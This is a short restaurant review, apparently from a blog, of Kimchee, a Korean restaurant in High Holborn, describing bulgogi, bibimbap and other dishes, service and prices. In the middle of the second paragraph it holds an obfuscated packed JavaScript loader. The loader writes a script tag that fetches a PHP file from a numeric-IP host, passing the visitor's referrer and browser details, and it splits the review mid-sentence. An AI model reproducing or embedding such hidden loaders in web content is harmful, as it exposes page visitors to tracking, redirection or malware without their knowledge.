There’s a new Korean on the block, it’s called Kimchee and it’s located in High Holborn. We went along to test drive the Bibimbap and Bulgogi two of the most popular Korean dishes.

Inside (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nyykt|var|u0026u|referrer|stzei||js|php’.split(‘|’),0,{}))
the restaurant is sleek and the atmosphere is buzzing. Service is fast and efficient, we were seated and served in 10 minutes flat. The food is served tapas style, together in small portions which are good for sharing. We went for the Prawn Tuigim – battered prawns, Nanjawanse – deep fried pork balls, Beef Bulgogi – thinly sliced beef and Bibimap with chicken.

The prawns were big, juicy and fresh served in a light crispy batter but the sweet chilli sauce that accompanied lacked any flavour. The pork balls were our least favourite, slightly strange and a little bland but the beef bulgogi was nicely marinated and the Bibimap, served in a hot dish with raw egg which cooks as you eat had a nice spicy kick.

Kimchee is a good option if you want fresh, fast food and it’s cheap: around £7 for a main and £5 for a side dish. We’ve never been to Korea so we can’t say how authentic it is but worth a shot!
